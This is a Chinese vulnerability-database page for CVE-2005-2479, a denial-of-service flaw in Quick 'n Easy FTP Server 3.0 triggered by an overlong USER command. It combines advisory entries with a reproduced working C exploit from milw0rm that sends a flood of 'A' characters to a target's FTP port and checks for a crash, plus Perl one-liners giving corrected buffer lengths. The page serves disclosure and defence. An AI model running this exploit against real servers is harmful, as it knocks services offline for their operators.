CVE-2005-2479
CVSS5.0
发布时间 :2005-08-05 00:00:00
修订时间 :2016-10-17 23:27:49
NMCOES    

[原文]Quick 'n Easy FTP Server 3.0 allows remote attackers to cause a denial of service (application crash or CPU consumption) via a long USER command.


[CNNVD]Pablo Software Solutions Quick'n Easy FTP Server用户命令拒绝服务漏洞(CNNVD-200508-065)

        Quick'n Easy FTP Server是Windows 98/NT/XP平台上的一款多线程FTP server。
        Quick'n Easy FTP Server对超长畸形的命令参数处理存在漏洞,远程攻击者可能利用此漏洞对服务器程序执行拒绝服务攻击。由于没有检查和过滤用户命令输入,因此攻击者可以通过向用户命令发送超长的参数(大约1024个字符)杀死进程而不显示任何错误消息。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2479
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2479
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-065
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=112300508617889&w=2
(UNKNOWN)  BUGTRAQ  20050802 Quick 'n Easy FTP Server 3.0 pro / lite (buffer overflow
http://marc.info/?l=bugtraq&m=112309262324047&w=2
(UNKNOWN)  BUGTRAQ  20050802 Re: Quick 'n Easy FTP Server 3.0 pro / lite (buffer overflow
http://marc.info/?l=bugtraq&m=112319110831249&w=2
(UNKNOWN)  BUGTRAQ  20050803 Re: Re: Quick 'n Easy FTP Server 3.0 pro / lite (buffer overflow
http://securitytracker.com/id?1014615
(UNKNOWN)  SECTRACK  1014615
http://www.securityfocus.com/archive/1/archive/1/428812/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060325 Re: Quick 'n Easy FTP Server 3.0 pro / lite (buffer overflow vulnerabilities)
http://www.securityfocus.com/bid/14451
(UNKNOWN)  BID  14451
http://xforce.iss.net/xforce/xfdb/21679
(UNKNOWN)  XF  quickneasy-user-command-dos(21679)

- 漏洞信息

Pablo Software Solutions Quick'n Easy FTP Server用户命令拒绝服务漏洞
中危 其他
2005-08-05 00:00:00 2005-10-20 00:00:00
远程  
        Quick'n Easy FTP Server是Windows 98/NT/XP平台上的一款多线程FTP server。
        Quick'n Easy FTP Server对超长畸形的命令参数处理存在漏洞,远程攻击者可能利用此漏洞对服务器程序执行拒绝服务攻击。由于没有检查和过滤用户命令输入,因此攻击者可以通过向用户命令发送超长的参数(大约1024个字符)杀死进程而不显示任何错误消息。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.pablosoftwaresolutions.com/html/quick__n_easy_ftp_server.html

- 漏洞信息 (1129)

Quick 'n EasY <= 3.0 FTP Server Remote Denial of Service Exploit (EDBID:1129)
windows dos
2005-08-02 Verified
0 Kozan
N/A [点击下载]
/*****************************************************************

Quick'n Easy FTP Server 3.0 (pro and lite) Remote D.o.S Exploit by Kozan
( Based on matiteman's code in perl )

Application: Quick 'n Easy FTP Server 3.0 (pro and lite)
Vendor: www.pablosoftwaresolutions.com

Discovered by: matiteman
Exploit Coded by: Kozan
Credits to ATmaCA, matiteman
Web: www.spyinstructors.com
Mail: kozan@spyinstructors.com

*****************************************************************/

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>


#pragma comment(lib,"ws2_32.lib")

char Buff[] =
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41";



int main(int argc, char *argv[])
{
       fprintf(stdout, "Quick'n Easy FTP Server 3.0 (pro and lite) Remote D.o.S Exploit by Kozan\n");
       fprintf(stdout, "Discovered by: matiteman\n");
       fprintf(stdout, "Exploit Coded by: Kozan\n");
       fprintf(stdout, "Credits to ATmaCA, matiteman\n\n");
       fprintf(stdout, "www.spyinstructors.com - kozan@spyinstructors.com\n");

       if(argc<2)
       {
               fprintf(stderr, "\n\nUsage: %s [Target IP]\n\n", argv[0]);
               return -1;
       }
       WSADATA wsaData;
       SOCKET sock;

       if( WSAStartup(0x0101,&wsaData) < 0 )
       {
               fprintf(stderr, "Winsock error!\n");
               return -1;
       }

       sock = socket(AF_INET,SOCK_STREAM,0);
       if( sock == -1 )
       {
               fprintf(stderr, "Socket error!\n");
               return -1;
       }

       struct sockaddr_in addr;

       addr.sin_family = AF_INET;
       addr.sin_port = htons(21);
       addr.sin_addr.s_addr = inet_addr(argv[1]);
       memset(&(addr.sin_zero), '\0', 8);

       fprintf(stdout, "Connecting to %s ...\n", argv[1]);

       if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )
       {
               fprintf(stderr, "Connection failed!\n");
               closesocket(sock);
               return -1;
       }

       fprintf(stdout, "Connected.\n");

       char *pszBuf1 = (char *)malloc(sizeof(Buff)+10);

       wsprintf(pszBuf1, "USER %s\r\n", Buff);

       fprintf(stdout, "Sending B.o.F USER command ...\n");

       if( send(sock,pszBuf1,strlen(pszBuf1),0) == -1 )
       {
               fprintf(stderr, "Could not sent!\n");
               closesocket(sock);
               return -1;
       }

       fprintf(stdout, "String sent...\n");
       Sleep(500);
       fprintf(stdout, "Please wait, checking if the server crashed or not...\n");

       if( send(sock,pszBuf1,strlen(pszBuf1),0) == -1 )
       {
               fprintf(stdout, "Server Crashed!!!\n");
               closesocket(sock);
               return -1;
       }

       fprintf(stdout, "Server is still alive. Maybe it is not vulnerable or allready patched!\n");
       closesocket(sock);
       WSACleanup();

       return 0;
}

// milw0rm.com [2005-08-02]
		

- 漏洞信息

18664
Quick 'n Easy FTP Server USER Command Remote Overflow DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

A remote overflow exists in Quick 'n Easy FTP Server. The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request containing an overly long string to the 'USER' command, a remote attacker can cause the application to crash resulting in a loss of availability.

- 时间线

2005-08-02 Unknow
2005-08-02 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Pablo Software Solutions Quick 'n Easy FTP Server User Command Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 14451
Yes No
2005-08-02 12:00:00 2011-02-28 05:28:00
Credit for the discovery of this vulnerability goes to matiteman.

- 受影响的程序版本

Pablo Software Solutions Quick And Easy FTP Server 3.0
Pablo Software Solutions Quick And Easy FTP Server 3.2

- 漏洞讨论

Quick 'n Easy FTP Server is prone to a remotely exploitable denial-of-service vulnerability. Attackers may trigger this through an overly long argument for the USER command.

Successful exploiting this issue may allow attackers to exhaust system resources and crash the server.

- 漏洞利用

A proof-of-concept exploit has been provided by matiteman.

It has been reported that the values in the proof of concept are incorrect. The correct overflow values should be:

print $socket "user " . "A" x 10240 . "\r\n";

print $socket "user " . "A" x 21048 . "\r\n";

The following exploit code is available:

- 解决方案

Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站